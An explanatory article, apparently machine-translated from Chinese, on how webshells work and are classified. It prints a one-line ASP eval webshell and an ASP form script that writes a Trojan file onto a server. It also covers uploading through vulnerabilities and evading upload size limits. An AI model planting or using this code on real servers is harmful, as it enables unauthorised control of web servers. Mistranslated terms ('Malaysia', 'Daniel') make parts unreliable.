Webshell Principle

Research on Webshell Implementation and Hiding
1. What is  webshell
Introduction to  webshell

Webshell, as the name implies: web refers to the web server, and the shell is a script program written in a scripting language, webshell is a management tool for the web, the authority to operate the web server, also called webadmin. Webshell is generally used by website administrators for website management, server management, etc. However, due to the powerful function of webshell, you can upload and download files, view the database, and even call some system-related commands on the server (such as creating users, Modify and delete files, etc.), usually used by hackers, through some uploading methods, hackers upload their own webshell to the directory of the web server's page, and then invade through the form of page access, or connect to the local by inserting a sentence Some related tools directly invade the server.
Classification of webshell

Webshell can be divided into PHP script Trojan, ASP script Trojan, and .NET-based script Trojan and JSP script Trojan according to the script. In foreign countries, there are dynamic web pages written in the Python scripting language, and of course there are webshells related to them.
According to the function, it is also divided into horses and ponies. Pony usually refers to a sentence Trojan, for example: <%eval request(“pass”)%> usually write this sentence in a document, and then change the file name to xx .asp. Then pass it to the server. Here the eval method converts request ("pass") into code execution. The function of the request function is to apply external files. This is equivalent to the client configuration of a Trojan horse. Server configuration (ie local configuration):

<form action=http://host path/TEXT.asp method=post>
<textarea name=value cols=120 rows=10 width=45>
set lP=server.createObject("Adodb.Stream")//Create stream object
lP.Open //Open
lP.Type=2 //In text
lP.CharSet="gb2312" //Font standard
lP.writetext request("newvalue")
lP.SaveToFile server.mappath("newmm.asp"), 2 //Write Trojan content to newmm.asp by overwriting the file, 2 is the overwritten method
lP.Close //Close the object
set lP=nothing //Release the object
response.redirect "newmm.asp" //Turn to newmm.asp
</textarea>
<textarea name=newvalue cols=120 rows=10 width=45> (add content to generate Trojan horse)
</textarea>
<BR>
<center>


<input type=submit value=Submit>

Here, the Trojan is submitted by submitting the form. The specific method is to define an object IP, and then write the content of newvalue in text (the content of newvalue is defined in textarea), and write to generate the ASP file in an overwritten manner. And then execute this script. The value in the client represents the name of the form, which must be the same as the form name in the post submission of the server (local), so the value here can be any character, equivalent to a password or something, but this The'password' is in clear text and can be intercepted. The one-word principle of PHP is similar to the above principle, that is, the difference in language leads to different syntax. This is the basic working principle of pony.
The working mode of Malaysia is much simpler. There is no difference between the client and the server. Some script Daniel directly integrates the one-word Trojan server together, uploads Malaysia through an upload vulnerability, and then copies the URL of the Malaysia. The address is directly accessed and the penetration of the web server is performed on the page. However, some websites have strict restrictions on uploading files, because Malaysia has many functions, so the volume is relatively large, it is likely to exceed the website upload limit, but the size of the horse can be controlled (such as copying the code many times, Or insert the code in a garbled file), but the pony is more complicated to operate, you can first upload the pony to get the webshell, and then upload the pony to the server through the pony connection.